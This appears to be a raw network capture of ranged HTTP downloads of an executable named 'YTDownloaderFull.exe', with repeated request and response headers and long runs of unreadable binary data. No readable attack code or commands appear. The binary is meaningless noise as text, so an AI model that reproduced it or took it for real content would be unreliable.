..L...."..&&.i...*.._6.p......0.c.../.......{..6z..i.....!.CK.%.Q.pI.(
..N.q..|.r'..V...\.......F......>.OtT...Ey...xKr...P....1r.J.XE....
...`.zm...u.6..&D..Hn..).(.T..h...qX...$..f..l.0.Bk= .Y...mB.VY.9d..:.
EG.u.1...EH....[..U0...q...)c&N..~....... ..q..su...P4...dU.U...=EE...
...N..K.H..."...n<.5..6.....'....b..&_.l.K[...F.0.._.......oa.TV...
^.la.%B.6e.f...u...kj....iG....9.H.....yP.PD|...j...jaR..D.U..<Q.xG
...C.#.b.Pr h."8#T...<.....b9...0......fHqr...s.JpV.=.nB..J..gc..f.
...$....g..Ip.... Mn.T%..t}...>....O...!......6cwz..-D.WO{'.....v&.
...Mm..d}..}?5.0yf../...,.. ..w.:.X.jk.7.....k;].....}.Ya.C......."B#.
...E..$....Z...%..zE...(.Q..0\..:.../.......%.....S...Y.4lm\.....Iy...
."...Fbq*[email protected]#@...4..n..DtH\gL;...<..5....QP....../....s...by.:.a
...W6....n..g.YB/........... "VR.9.w2.C(.h....$.)..wIh!L9..'.3..|....(
._xi..Y:>^.2'....o.z...xET./...}pp...}'`\........Z....<..5......
'...e..._.(.d3HmHz.....zv..$|.[{....Y......~....sJX.Ho...i% ......<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3000000-3249999/7202374
G.A%..G..m...A..!.L.._Ey.......p1=....?Jm.y....x.f.....>. .<..g.
.!..Z[t3Q..!..q.<......2._.o...4.{S.....%..j5C..AY.....N..~Mo..... 
.;)....VE(..w..W"..nw.HM..XqG.=.....0`Y.1......,Q!H...][.W..i.C9!.Nr..
I....~.3..1..7~.3.0.}a.A.80p....[..x`i..."}..c..x]....9......1....:.R.
.,.\.#..~..7Y.z..?.l.&x0..@....}.c..g.....E.....:.J..tq~R....o...4.o.N
.......W..%..QR'0..,......#O..... r..P.Y.:@u._h../.5...5.a#..~..3Z....
?.l,.I.-.9....%.A1f%.,d..}.l........>...q.Y)!..BL....O|b........_..
.ut..\%u{...{."... ....<..2/.]..b.\I.~..(}..n..R.....). .b...NFk;.S
.$.....M..*!.?3"..}5.....s.....v...i..;(l.C.w.W....Uk( >7.k..~..<
;.7....Tc....}.....wLo..\V.;..U...[..\.;...Y)6.....1..........@ $..!.'
.^.6.~....$_....m..V.o.....]&%.9.P.2....C.e_.#Y.O..(u...M./...a...Uu:C
...m}>.G.....#5W.[~.S..sU..(.....e..O #..-.\.:.c...%R...D5t.2N...E.
.(.=.1..~.u.M.D......x...2t?.. ..\H.....|W..7.*?...q.9>/4..g.2....\
.Q......D..]\..`0A]...7S......y.-.,[.T..v.v..i....G..!..P......o....vi
/....y-,.bl......<.M)D.............7..3.NA.....X.........6u....yA.@
F.."....e.(d. DC#!.USsu.aH.Sg ...$i..^...K...R_h*Z..oD=..LSR..>%...
&M......Z......'.O.....o........\.........U.l.n0P...{.........hh..... 
..79...U....0.....RF..".~..e. ._..J&O..A.B..l....8.dki...^lF$2b.zU.O..
...G9...;....!........E.-.DjL....`5g..y........f.....Q..%..... 6.S>
......7..4...B...(...4G<B.../...%....)Y.(4.d.....H..q.GS....vS.."~.
.>.(.Ptf.-..u  C.?.....>a..o.....%.nW.FP..B...7....%#pc..._G...{
.r...rc....//.1.....Q..$.~..l..0..>r........k..:.u...O]....?...<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3250000-3499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:05 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3250000-3499999/7202374
.......9.......EIR.....#%2..c....u....n..\....!);Y.GM.wW.C..%.&Xz..Lvh
=A.3. . [email protected].`..o8.........&.....2
.0...O./gM.F..!6....7p..m...M9&..`.I.......d..w..k:v.b............X..A
"....{.oX..W...T. E...PS4...r.{......L..4......_..Y...v...gL...[P.n|..
.o.u....d.........7...Rb..........).STZ.u.../...p..>..Q.w".zW..S.'.
.dU/e?(....$......0...> |k..[....!8f2....[...d q.~..|.t...Xo.....{T
.VF*~.).u.}......y...E....\..&of.E.....V(......,JCf.u5....?..H..n..oc8
./..r........TY.p...vHu..v....r.'....x..H..D.5..k.-Y..0..e...: f...3..
.4.NR]...#f...\."........#.}-LLq..v..W..F.|......Z.g..j.d....n...Iq...
}_.G=.(.."....}..(/.$..X.]&|..iu...,t.>.R.....*C.2.9`. .`..*....7..
[email protected]."O..........S......2......!_...Z.f.h.'........... .
.......q.Plq1^.<oL..v... z.d.v.g....RJr.mOl.4g....KKN......NR.8.. O
'.6..../.c$.GA....M.9.......qr9...T ......@ #.o.-7...*m[.^....i.l.....
.?.I.....**...R.....^S.E..Wr.mX.............G:.v.Qr%......v.. .~.TJ...
.8.U...I...Q..Z.....1...t..)X...T..4..7...l.."..[-..?.&f..9..sV..HD...
.A..z.......9..V>Aw|.G(N...8.. R.X.J_l..mo8.7....;....z&TiN|B....\v
...[..r69..(..'y.'..rR&`.DN. ......$&..S.^/.AFi.B..).u.J:.)..o.._8.\.*
.h..\...O.(p...VKQ.T...p...[i2d..l.....a..%....#.,.$..k..~...umP.....z
..M....X.....4G.U*.Z...;?.`..o..].....)..B..e.}nv..?.b0...."H..H.s=B..
...vE...4Cc;.z.z...3...(....-.r.w..v.]....IM..... ....7)....&B.BA3.O..
......*.u....6.9Da.KW.'.;.lQ....n.3.c.....K.D.^..EVbMX--y{.3.C.<.W.
..^'L...>.......[.3r3. ,.......9eJj....8.......z.u....~...#....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3500000-3749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:05 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3500000-3749999/7202374
..S._;&....2%%[email protected]..._EP.z...S....
...Ff.F!.}....-.6 .9I.....5......%......2".>B..V?..-1.f3...WT._L..G
J.6...v.R..a6........k.j.&....s.......T..&.N{.VWH...80T..a...`...-s]..
.j..B?4FjU..N...3.3B..c......Fm.....}.P...,.'....r(z....RgX8.1.....=..
...$f.......S...G$s......^....U`.-.7..z.W.).O...............*T..Rl=...
...H.a.!.gq...-..........n.......Q....h..M.M7..8.~}/. .L.6E.U.Q1.Xx?..
.(,.....7..`]..b..N......u.....6..l!.2..l.k.l..'...S...2.. .=~.U]..,7.
..xM..-...,{[email protected]....`.!N..rK...f..1.."......X.".%.O....>.A*.&
lt;.."sJ"N...Z.e"k@{. .g-...&.%<@.[..........R=.(..s............a.b
e`\..C..fx..0....=..6..* .L$.a....O.....[.......$"....2..>>.]...
.M..\. i.5..p......Z..BC....%.g.WO....j........C.....\.............H.5
w...].8.G [email protected]:....O....{U..2z[.9kt./z(.1.....
...}x..T..=4..%D..4.S...kQ..P6;...b."0o...........qo./..d.#R.u.....'..
..]..w.g....,[email protected]'6r...`.o]...}B^....3P.n..h..pg...{Ie>....
.s..H..u..-...QC..~f..2._y.;U....=..W.Nv.3&~@Ffu......../.{3..c...h..S
5i....L.x.uA...Cd.9.H..h..6X?.vW...W.z......! .H2d.%.YS.C...ly8....a..
..W.61{...... .iv.X...........*.Z.O7}?...?.....i.LT..........&.. Zt..y
Gi........E6....<N<c"...[F#.N..... ...~%..~...#.Bn'd...".<0..
.ES...8...x..].....c!..6..(...u.W(n.M.."Pa...:a.w..T.w|..|,..G......F.
.....E.<.$k....dM|O.n.p.....D.l..0..&...S./O2..3. aUx..W7B.....W.K.
.([N.`T.l..r....t'`c..^.\X]IkW...........l{..3....lx].....v.J..=..@]..
..QKPfqb.6..0.N.Rnb#t..H...3.T.4...U),Zf..5...M9.....m...9.f.p....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3750000-3999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:05 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3750000-3999999/7202374
;..jH.....R..IR..=}...B.I..].[g.K69.Q.....)Gn.h. ..w.....6cn.-A.......
....V.8=..W...e../[/9..c.=1^..mx!O..........}..F...X`>....z.u:x.\..
....F..le...O-.G..W.....Z..#.!05......fI...%...jK1......CP....5.>5j
tGC.q......g....f.~..A..X.....O.5m{....k..y.(....C.B.*...j.6'...qgl.w.
@....(..Y.f.nze.G.;......!.T.T.q..."..8x.R:.....)n..M....)<. .A.g.s
9...J.u.....Q..5>P:n..L~R..c..vp.pp........e..?......x.I..."...4..#
.w.!.|)..QS]3.S.r.......!.*1...........w....O^..Ks...s.....v..2F).{i .
.F.vH........>.G....H.VR...96.R.9..3.c............*".IT.VS.....x.n.
..>....a...h....$cn..........)-..?~.5..td.2.Z....R.-u%...j.Z....,..
...M`C.........%.i..=.h'\<.C.c...H.9..YHR.v1,..4..J./..&.\.1#.pw..~
.8NxPG...Y.Y...[[email protected].>$.e..g5I.,m.;'....r(.].6.J.{......EG.....
.....3._....d.....c.....]3=..^.1U...x.fb..d..Q8b..e:..Q.......8P!...u%
%Q...|.T.L.U.....0>.J.Ke.~..oY..f.5o......oM...,NU...U.|.e ...c....
..FK..xB.}.L...%....ZR~.C......c....3.j.X\5Z..#~......}..7....h/ED....
k..TOE8.......y.!.....T......L.Q....J.R.....Y.7...YH(T.aB..U....p:...q
..z..Z.py\.\__......W.K.b.c.]......e....,..........z....\......6|.....
..J..vlV.t.......52.J...G.......9..!....p.....r .....j....."K....H.X..
.'...............bb}......9.]k(..*.n.............3..y9.'Q1....M.x..y.?
V...vR.T..GO:.....LH......?0|0F...d......D.a\.wN..Zs... Z......\......
............'8L0tt....*..'7.j>D...G..]..0..)H<.w..>..{."k....
\W...h..n...\].`0..j..c..JhUR...K.cxs...._..B.o.{V.*.@... .2.wJ....a%.
.Vk.O.L.j9.QgK/x...R.b.j.....l>.8LXgv...f.Y`{.|:9%.......dD..P.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4000000-4249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:05 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4000000-4249999/7202374
.Q~L..N...m.2..{w.......E.....y.....X....0.o..%vR..f.....h&` .WUZ..f}%
.J.mX$....g.k.wgw.V6.Yv_.....g..i.........X,[o....l.....~.{In.......fl
,a...[O......7....$.OD.....}....f.2.o... .g.....4.....N.....j.)..K.]4.
....}..j...E..?.|:.j.F.A.b..1..A....3.!0.aS ...dRPwn..y......2 .......
v...G.(.....0.[...D.25.i6...x....=....x...Z_..........t.....N.4.]..C-S
..b....b2...g3.q5.b.J%S.Z.......;......22(...G...8..z....y......X)`s..
....6-9.y. 0U.O.......I...'[email protected]..}.. ..p.0.v...=..
mX.Ek.y..'=.b.;.........$,W....Y.JXH..V"..SJ\.x...P.N.f...x.6q.Te{..W.
......5Z...,.e...C....k....S....C[.W..,..z.o p.D.eP......2...y.f..^P..
K.......e.f."tGg..mh....i.2./b^?......<.-D....r.....c...=..'..N...m
...9$h........9....MX.....Zq...za.F..{.Aq ..,.2DEp..`n0.w.Z,...N....].
...).....:".Z...T..K..#v....V.'.q..H..i.Q....Z...7.......).e'uh.i...=.
.....F..A.lb..4.f....v..."...I.37...lB'Cb..n0.....~...V...`.[........T
..!....<.... 4....T..y~........h#R..>.5.3.E...C.~&.).u....-.....
..}..W..f. #......*3p..d.\)[email protected]..@...)..^.....D.;.=..a@.
...{./]:...'n....r._....@...@.|'. .....?.S....N......k.=&..3..0'A.. ..
 B.T..[..w...{...5....i...0".......!;.6'&2.v...}..n*{[email protected].=..BE.
......../..X.'.......$....3...4F4..][email protected]`.w..2}.....?@.(......}).MD
N>........qR....L..".....N....t.t.......[k7].....< .s.L>.m!X.
...."N.o.&N....c4to.R.9.`a...<.h..yy ........A.kg..._.j...*.z...=^.
[...|.1,.%.w..,..[........J=?...(..HRB....H[o.5...!O........YM...Ei4..
....)ka.3m.5 ...*e.....H..(.....-N.........W.?h....m.......o...#..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4250000-4499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:05 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4250000-4499999/7202374
.P...{..e...(!.$;.`QZT6..V\.q. /.y.i..?...{...| ..6:m.w...cmc$...^I.v.
.H..n,..%8h....Q=...2".,..j.....=H.^M([email protected].
.%....w..R.KTJ. .t....?..jx..D..X(..E..b.x.k..~...........{2>......
;0..X.~`....1YI.a.W.QL........u...chM:B.......{..w.....x.. .f..]`..f..
v.......#,.=...?..1X....C..M`6CI...F;....\.....)>.o..;P.F7..E. .NK.
[email protected]" ;[email protected],w..<G.. .....2.b.. I..M.k.\..q.~.r.
P.;fW.C..4..~.F.J{..5.v.n.I.8..[...~.^.....t.1.C.#4WD.#......U|Dq|..&g
t;._.U.....o....5.S..G.Nf.Y.9.[4.....n....KqZ?.R<.j.....5(g.P...Y.g
..|,.3......'b(JU.DH.4..K;.).T?.HFv1...y.....u...0....{jQ..7*Z......A.
I;.e4z.#o//1;.".......c......!.(...Z....d~..L...8.....C...9&.W.[?Ln...
M!.X..L.t.W.r7 H.Y..l..7I......#.....r.?.e........M.@`..h/....H1......
YELC....q4.H.K...R.|...u.*..z....j'.F..Tk..3Y9.#..2&!e.......\......".
.ah.S..0..[7.~....tT....[........[..>...J&.x......Z.......v..L..q.2
.u..E....._5...]..ZF.7M.....k....9./g....u.O..#...........b .._....b..
x@j.&H.8_'.<(....G*...b6.......H.s.#.g..EC=A..u....]..%..a..]......
C.-.z...28...2.Q............. ..!C.Z9....>...WoQ..s.....\.....j.>
;.W.`Q...u...~.j.Sk.........l*$yAv.4..bJ^.M.o.Y&c.t]..<.......R.p{.
. ..U.%M.?....l.....g....=.s../......?.Q....8Xh|.. ?b....}....;.....sy
.K,. 8..NW......Mo..T.7.j..'......vL.^.6..c.'s.qm.!.X......C..u!. .B.h
..eF.2..{F........U...o....p...w..].....F...d='S.n.E7..[..}.5.:.......
.3p$.J\6]....f.Z..T.I.W.V.N].....7.X ..X..En....~l.........7...e./#...
..$TX.....S..2.&Q....B=.T7T~).[...]........../.3.T..m-W.... ..p.'.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4500000-4749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:06 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4500000-4749999/7202374
.. .....`.r`K.=.....T....d...o.i...[.....n\..(.......Hx..R.3.C.S....6.
W........e..AG.J..1 .~.8....y..R.|7..p ..!6.,.Tb|r....i.`.U. z.....O!@
....a...*.Io.50h....q.8 '..g"...'..AC.}.J$........J....fh.......Sk.K.V
.v 1.M|J.......0.O.....x)..c.5...g@P....<..`....GaE.=z.....*.m..9..
.FhZ..D%h.."&..T.._....E..=.p~kg .*...)._EuFGV&..{.t..)...|..q..$.....
....Z../.....4..L.....s:....8..E"y..2*r..aS.Y.?............\.0...pi..\
S..y.R3a.........".....2>[email protected]....
G*....$....r..)..W.&.....&..(...W.z...*...>...7.E..2sy..OsNc.n'...g
O...J......8."'..x..~..........~I..8.M..di..A|.X*-bk.]%...x.C.mb..[..L
j.B{R...k.H..&.2.p....S..(..}p....}.K....wAPp...&.d\e..%,6nX"......o..
.!...O@(7...E.....F......O.B..x..F"|o..%/.9/...}.... ...D.....j...O.{.
..K.P...R8.J..X.......Z.{..p^......?...Q.....H!.^..#n...U.....z..,.f..
......^.0G...}~..F..4.1x`^...-....u.8.8u....BU).A.`...}[email protected]..&g
t;5.uz.4..N*...34._.C%J.a......B.^...XNRZF}..e>...?h9.G..o.X..\....
H-...........1..1/z...j.6....xm.w...:...>u.D..M_....t......5.=.....
{j.N....'.....!.0.2*{s"55.T.......,..h`....#..X...q...o.f.{.-......<
;...[).Z.!..Z;.v4.QD...#....#o|...^..u../t6WI.x./.C;.\..I."w..M#..b=..
m...Al2...>...r./0_..yy:...c..P.u..s..%..U..Q%...z.3...'..^.CM...x.
.p..b7........T]M.....4...<.b...9V.....CgM.br dq....7x6.6........~l
>.....6.zS...7C^..|........|Be..{ .c.&....(.....6s.......Fhm...&.3.
.0TT.....>0..p. ....W..3>..~...T.......^../2\..9:b[o.....&Qg.R.o
~.C...^...C..zN.......9..m.......".....3..=.p<.|..k-G.....Q...8<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4750000-4999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:06 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4750000-4999999/7202374
......pK /..%.8C.1E.....;.C..O..m..._.$F..v....L....b...R...e#...(...[
|....o".<P.. L...~.........JY...at.w.....3....v2...=?.M....iS.q...a
.s...........!........f......k.F]...;. ......S........(...."..0Zi.u..F
......\,....fltA......U.O......:.G& [email protected]:..v,
...T.........fyw[..9.F.j.u`.W..7.;2........XQP...{-R...J.....-{9....w.
.U..M.L.*.)S..'.i.....?..;f.....j.P......D.%..Y._..Q..8...E'2T.KP=..g_
.-WT..K)[email protected];..O.....{*.k...z.[...&..28..pZs.;ZqWD{?d..]J(..AA.,..d*.
.a..j..n....zgk ...*..}.!W....k.Z.2.^.m.....(F..=#.<."%[email protected].
..(@.W.'.F..oUI.S.S].C(jk..J.A....(..=v*.'.....l..(..>.y0....`2j27.
 .Qh.l...kA.56.N.-....pt..T.-=..X.!S.`O!}..o.._.O.8.n.Uvi.X..6..`.{...
.(.=.A.Y.!..].~B)H-.L&c{.?.`.....R._U.D\m...`.........o.Xd....c'.w....
..{....`..%{. k.. ..hi./....d ......s5....Ut(.T.......u..^S<.. ...l
1.U..xOi.D...H..}@.{.t$...b... .........N.x..w.L.p..9.i.....Q.D%.`....
...{0....r.jo.g..k..N..`|.......j.q..&!8h..rf.:.......f..$O.T..SFF.?..
..S.._...6.....2..~E.v.}.k..R.<... .'.#.O............H...2..M./#..B
.....V....;R.t..`.v....eh.S..p.6..f..C...s.E..3...e...mJ./<..cnf.kL
.../....o..)......F.........m..J1Dj...Y.pV.....%:f/.......'L...~%..;..
./.'.R.@.,....8..B....w~o.n..L.!.G.f.....Ty.. ... ....W>..i.K.c.:.U
.oYh.;.=.u.S..... .`.,.g..=[tG4..[..\.......d.|.E.OV^[Y...Of.....0..e 
[email protected]..).a.Qj.X W..5..>.......k..>1.C...5.)._{....r...g.... 
....t......<m..."...`j.w.......[..~.|&:t..c.Y.#n.<..zh... .\x...
%,\...K.....l.............L.5.{..!b.By.Q.Gc0...^..........gc...e..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5000000-5249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:06 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5000000-5249999/7202374
.V.`.....T.M7.'o2.....^......~F%.`}....r.,D...n..Q.b..j...s..l.w..<
.%..=..........o.j8<.... ...V._.0.......N7...1..I..u..P..P....a.J.(
.B....~...0...J tb:$h:...n=)o3u[P...s..M..}a..:{/...A..._...y?........
.g>.../n....qJ4.'.vJA.{Y...B_.h.:...U..6..5...~h...`..F........9...
R.6.h..D.."...E..0.....T.6.S>.'..qV......".=..P..9.W,...}.8..4...u.
.z.....8........[.y1-:...I!.......s..........#.r...l%..........-i'....
d.....I.)[U.tJMNshV09...e.....j..\HzA.....*Xb.Rd........;..g.3........
0.......b..,p`...-U....P....4.B..6...x.K^...Xt....t......i....r*M.$<
;2.UZ..._.....|..L....EP.0.o..O.;3....&".o.....A..t2.i....d....WR?ma%.
H.H.lg...=...k...jT.M..R.../.....p.hu.q.,..)[email protected].
4...z.=.~;.......^$dZ.&.i....l.."U.n....V...i.......C...p......x.a...S
.....1Q..6>8.....n...Q..... ..y.5.P(...J....NH.l....b;.....RY..{NY`
k..'.R.`.y.T.l...]9..e5,`h...m.."......U...L.M.m.:..E....sQ!.I0X.w...l
..y;H.......M..!e...7.ms,.tj......*..a...t....~V.j.q.....|aDg........Q
.r6X.._9.[.q...y.\... Q...eW* G.>.N.!....#_..<fR.w2.._.,'.~..T".
.s..p....iW...-O...=r.~.."[2..~M.9r\._........p.n..k9..<....<g..
...E_.....r......N.......P.......w.6If....5...q...y.TpMM....P...|.M...
....:..P../.j<.HL.....]..L)(.4k...,RZ_.GC]u4...%..C..g...9...g}....
.JmE...#y...{4.....)R...u)...b......5`Z...,jo.h@;...0.%k....cv.&X{.?D.
8..>.9....u.K...#..".K..l...,@...[.s..~..yH..$....*o".....ub.r.)...
.U..RV.n........F....o.._...W....!..A..a|f..{.`.........y..F.`B..U19..
..6*0.Sw...G...d'Yz<.P.....U..jo..>..2lE.. ...J~.Nz=........<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5250000-5499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:06 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5250000-5499999/7202374
[..sId...J...z.=.k..L2.q V.S...__.jJ...x.....>...b.....c......g....
.>.j2.........k...G....T..-..r..<QL........A..{..l.G..o=..j...*.
Y..C,.P.J..,.<.....N8..V......&...~..0..P.).....b.u..t.{.....qjN..-
........l.&.c'.?...Y......c.u.../....Q....I.*.C.........`)..H._r7p.G..
.2Tx...H....4.S*..u...l..J;q.................)..&..C.z.L.. .....b4d..F
j...*..{m....k5....p.Y...\...[1.....(..B.`8$..[..~..xt).k..q.m..?.m.Gj
`.5.Pk..&F...j....f..m.....O....._2.....c|...?......1....E.f_'.#.-....
.j..S.Y.Pg..,....F-0s.......D.z.t..b<...mBR.........`.`sii.~.......
..C....g....e..c.Rqu.8:.]b*..>..c..]._;...<h.....A..J.[&g.......
...k^.d.F...LH......."......J...0......a.)...P.!p.......F..........D,.
...... U'[email protected]...,...2r%^........FB.)G.....c.5r.w[..5\...~.\
*{....eZ..J...#..h.{e[.....(6........%....Y..d.%\.O.E.W..]...S.xL...3.
.*..M...}..]...b..<[.....0..a..f.|.|.=..A.y.Y......Yc....L7... ..Cx
...........g....3.%vl|..j...c^4...l....`......,.(.F...Gi.$(...w.xyID..
#.&..'D...A...~....Q.H....O.]R~..<...tW...m...i...5..IEC.c=....Kv.(
Fx..P.lp.....{...A.z.S.k......f.Lh`...oA.sz.O.N.8....$.......u"^aZ..I]
.....6..PO3s#.... [email protected].[k.^>`.....y.h..oa...T
.....Y.....8W'...P..=1.>*m...U.e^..5....f.........d ...o9Y....j...%
.Z&T.6"..{.....S.ge..#......N.T.E.2....'.F..^.0.........p......<v.:
...pt....^8.{J.Z`{gW.){.....9d.J..-....Qpy).2...N ...S...;.`.l...$..&g
t;.....J.x.).9.7.".,".}....1=v..Q...9`...).....T Q.Djd<.]........P.
...J.*.d.........l...y..^.'..F6.R...1S5,.d.P.|8.~B`}.v..<.*..|.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5500000-5749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:06 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5500000-5749999/7202374
...P.B..o..g;.....nM.Z|....?.A...l..|d.....\E8.u{u.......{_.1....#-..y
.J.W........;....kfO.k... >.e.....W..b.t.yG...X....;. .,/.$*.v...\.
...r.P..l...U"....._W.#(.EA4Fp%'.T..J.. ...E.^rL/.!.Do.z**..qW.....>
;.......l..0.w..L.......;Z..a.....9S."j?.BkD.my..O...G0f.a59.i....9Ru.
. ...8.........a.._.=..e-8..0".m.....pU..:Z.i...K.Zt....i.K..BB.z.^...
